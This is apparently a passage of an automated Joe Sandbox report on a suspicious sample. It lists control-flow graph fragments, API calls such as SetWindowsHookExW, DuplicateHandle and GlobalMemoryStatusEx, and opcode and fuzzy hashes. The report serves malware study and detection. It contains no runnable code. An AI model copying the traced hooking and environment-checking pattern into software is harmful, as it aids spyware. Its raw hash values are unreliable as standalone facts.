                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CB027
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                        • Opcode ID: 17578ec7ab44595a60073d3a90ad96e90f0fde2c92dbec53190aeb4cec4c721d
                                                                                                                                                                                                                                                                        • Instruction ID: 340f62560d8bbf0acdc607511b7dff6483863f5da4ce258b3ced5f2263510a8d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17578ec7ab44595a60073d3a90ad96e90f0fde2c92dbec53190aeb4cec4c721d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321E5B5D002499FDB10CF9AD885ADEBBF8EB48310F14801AE914A3310C379A955CF61

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 499 14cafa0-14cb034 DuplicateHandle 500 14cb03d-14cb05a 499->500 501 14cb036-14cb03c 499->501 501->500
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CB027
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                        • Opcode ID: 32650dc69c17a0dff4e27881e32fc445f282847a4e285bcbfc78823000e25502
                                                                                                                                                                                                                                                                        • Instruction ID: 3be400e5e9881144550894b8e223e5ae6e0f4e9c0db4de682c191c2063614b38
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32650dc69c17a0dff4e27881e32fc445f282847a4e285bcbfc78823000e25502
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121E4B5D00249DFDB10CF9AD885AEEFBF8EB48310F14801AE918A3310C375A954CFA1

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 504 14c5c40-14c5c92 506 14c5c9e-14c5cd0 SetWindowsHookExW 504->506 507 14c5c94 504->507 508 14c5cd9-14c5cfe 506->508 509 14c5cd2-14c5cd8 506->509 510 14c5c9c 507->510 509->508 510->506
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014C5CC3
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: HookWindows
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2559412058-0
                                                                                                                                                                                                                                                                        • Opcode ID: 9879cd3d7f7ace7dbdcaa4491148f376cafddd4b3038c80456c19e6c71bea0f5
                                                                                                                                                                                                                                                                        • Instruction ID: 1ffe1086e1cb4bf875a84a8599e5685d38f6b71eabaa6f9e82f06114370f5d05
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9879cd3d7f7ace7dbdcaa4491148f376cafddd4b3038c80456c19e6c71bea0f5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54213975D002098FDB24CFA9C845BEEBBF5EF88310F10841AD419A7260C775A945CFA0

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 514 14c5c48-14c5c92 516 14c5c9e-14c5cd0 SetWindowsHookExW 514->516 517 14c5c94 514->517 518 14c5cd9-14c5cfe 516->518 519 14c5cd2-14c5cd8 516->519 520 14c5c9c 517->520 519->518 520->516
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014C5CC3
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2463025501.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_14c0000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: HookWindows
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2559412058-0
                                                                                                                                                                                                                                                                        • Opcode ID: f90e4bb2d04fda0f11e3ddcbb077b33ac89336ac98c5233b3a0d58ad8dda4135
                                                                                                                                                                                                                                                                        • Instruction ID: 517a0775fc95a501a7f2e03b53f70f8afda2cafa6de781d68f3cb00d3aaa98fd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f90e4bb2d04fda0f11e3ddcbb077b33ac89336ac98c5233b3a0d58ad8dda4135
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1212475D002098FDB24DFAAC844BEEFBF5EF88310F10842AE419A7250CB75A945CFA1

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 524 6d04d68-6d054ec GlobalMemoryStatusEx 527 6d054f5-6d0551d 524->527 528 6d054ee-6d054f4 524->528 528->527
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D053F2), ref: 06D054DF
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2477402119.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_6d00000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                        • Opcode ID: 7a25d9160ef2fe6a094e38f38740e14391bee36af2f24135300f0738b3055c8a
                                                                                                                                                                                                                                                                        • Instruction ID: 4ee64d2715c5eea4b996992809353b5daa372332fac75e4e5d2ce2fba3193474
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a25d9160ef2fe6a094e38f38740e14391bee36af2f24135300f0738b3055c8a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B1144B1C0066A9BDB20DF9AD444BDEFBF4EB48210F11812AD818A7240D378A911CFE1

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 531 6d05473-6d054b6 532 6d054be-6d054ec GlobalMemoryStatusEx 531->532 533 6d054f5-6d0551d 532->533 534 6d054ee-6d054f4 532->534 534->533
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D053F2), ref: 06D054DF
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2477402119.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_6d00000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                        • Opcode ID: 341b95b50da07d99861a651e744da344ffe09bb3809d60bb11d1c5126fd90fdc
                                                                                                                                                                                                                                                                        • Instruction ID: 085e2fdeb819c527cbcd8ba2b07846198b31c47c38c50d9e9d9f86381a2e66f2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341b95b50da07d99861a651e744da344ffe09bb3809d60bb11d1c5126fd90fdc
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C01126B5C0065A9FDB14CF9AD444BDEFBF4BF48310F15816AD818A7240D378A955CFA1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2459677461.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_121d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f51dcbd6cf581fea424ba0fa1b70d1bd191f4c6e4374a7ac63879834b757411a
                                                                                                                                                                                                                                                                        • Instruction ID: 272f0cb17739575339b89fb95e8a113149a26ba55f2390423f222b53b6a05875
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f51dcbd6cf581fea424ba0fa1b70d1bd191f4c6e4374a7ac63879834b757411a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2212871924344DFDF15DF94D9C8B2ABBA5FB94320F24C5A9E9090B24BC336D416CBA1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2459677461.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_121d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f80f9df06330797494d97d29d3772512e9b5be3d6c159580fd06945e1bc6dbc4
                                                                                                                                                                                                                                                                        • Instruction ID: 7f3c9b50b5603bf056ee167cb8f02d555ef527e0bd807f341b5fe23e1a1cb23e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f80f9df06330797494d97d29d3772512e9b5be3d6c159580fd06945e1bc6dbc4
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6214871510348EFDB15DF54E9C4B26BFA6FB94318F248169E9090B24AC336D416CBA2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 20ebdf9cb19655d42657b1e39ba30e36c9e62b136fd7a01b564f387272d2b135
                                                                                                                                                                                                                                                                        • Instruction ID: 4ce63de227216bbf934607d82c7b2d14e61b8a72b1a948ace17a888a5b82c8a4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20ebdf9cb19655d42657b1e39ba30e36c9e62b136fd7a01b564f387272d2b135
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF213475524308EFDB05DF94D9C0B2ABBA1FB88324F24C5ADE9094B242C376D806CEA1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: b4285718726abf7d29641978617dc62158ea1baa575741bbf6060fa91049ec7c
                                                                                                                                                                                                                                                                        • Instruction ID: b7529526a74c9a3b1f559a319d0b82cb6abd04cff5f5f5c256f17c4996f9fa5a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4285718726abf7d29641978617dc62158ea1baa575741bbf6060fa91049ec7c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C213771514208EFEB05DF54D9C0B2ABBA1FB84314F30C56DD9094B696C376D456CA61
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: faf643f98d432f6b4d9cf428f83fccfe0bc42b9e6e70c28990d71bf4c39de52d
                                                                                                                                                                                                                                                                        • Instruction ID: f7b678289eccdf8d2b435867c810299c04ebd64a8c2e22b73631173067cc2b25
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faf643f98d432f6b4d9cf428f83fccfe0bc42b9e6e70c28990d71bf4c39de52d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29214671624348EFDB24DFA4D5C0B1ABBA1EB84354F20C56DDA094B362C37AD947CA62
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 26dac53ea459ba150cfc7574b865fff30f694e248ebcff7d4f70d0e54b783776
                                                                                                                                                                                                                                                                        • Instruction ID: fddcd5baac57572c713778ccc408323df0a6f519ca91884cdea74d56d214c056
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26dac53ea459ba150cfc7574b865fff30f694e248ebcff7d4f70d0e54b783776
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2321A4715083849FD713CF64D994715BF71EB46314F28C5EAD9498F2A3C33A984ACB62
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2459677461.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_121d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: ab019a0b402ec2ec7784e07075d342e0cc9177e4ac29ae645b9e7779ba733592
                                                                                                                                                                                                                                                                        • Instruction ID: 8a78209cca4b6d2afb77fb35c9fab94510e67cda473cd6bea439dea6e95a4005
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab019a0b402ec2ec7784e07075d342e0cc9177e4ac29ae645b9e7779ba733592
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321CD76404284CFCB16CF44D9C4B1ABFA2FB84310F24C6A9D9080A25AC33AD426CFA1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2459677461.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_121d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                                                                                                                                                                                                                                        • Instruction ID: b41eede82a8d387b4178248c45d97f30ac42efd88f3c794be8d190ba0876837f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA110372404284DFCB16CF54E5C4B1ABFB2FB94314F24C5A9D9094B65BC336D456CBA1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 3ca54a8d87c36567c23f1f3029dd474bace64bacfb949533de9693f411bd8625
                                                                                                                                                                                                                                                                        • Instruction ID: b3b3c4bece2c13e75f1fefd1d5311fc3e236294bfcf1e3589f36e772da7e80fe
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca54a8d87c36567c23f1f3029dd474bace64bacfb949533de9693f411bd8625
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C110D75504284DFDB06CF54D9C0B19BFB1FB84314F34C6A9D9094B696C33AD40ACB62
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460015185.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_122d000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 3ca54a8d87c36567c23f1f3029dd474bace64bacfb949533de9693f411bd8625
                                                                                                                                                                                                                                                                        • Instruction ID: 444237365ede7388ff1408bbe5b832ee8e53f417102908b34aa1b2e1003f095b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca54a8d87c36567c23f1f3029dd474bace64bacfb949533de9693f411bd8625
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3411DD79504284DFDB06CF54D5C0B19BFA1FB84314F28C6A9D9494B256C33AD80ACFA1